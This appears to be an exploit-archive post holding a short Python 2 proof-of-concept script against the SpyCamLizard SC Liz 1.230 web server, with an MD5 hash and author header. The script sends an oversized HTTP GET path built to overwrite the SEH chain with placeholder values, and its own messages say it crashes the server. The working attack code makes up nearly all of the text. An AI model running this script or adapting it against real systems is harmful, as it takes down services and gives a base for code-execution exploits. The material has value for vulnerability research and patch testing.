SpyCamLizard SC Liz 1.230 Buffer Overflow

SpyCamLizard SC Liz version 1.230 remote buffer overflow exploit.


MD5 | 6e55e5266e19a7200127d846c175347a

import socket
import sys

author = '''

##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: [email protected] #
##############################################

# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay
# Date: 2017.03.22
# Exploit Author: Greg Priest
# Version: SpyCamLizard v1.230
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''

print "SpyCamLizard DoS Exploit running!"

host = "192.168.56.1"
port = 80
overflow = "A" * 1189
nextSEH = "BBBB"
SEH = "CCCC"
overflow2= "D" * 3803

crash = overflow+nextSEH+SEH+overflow2

httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
httpsocket.connect((host,port))
httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
httpsocket.close()


print "SpyCamLizard shutted down!"



Related Posts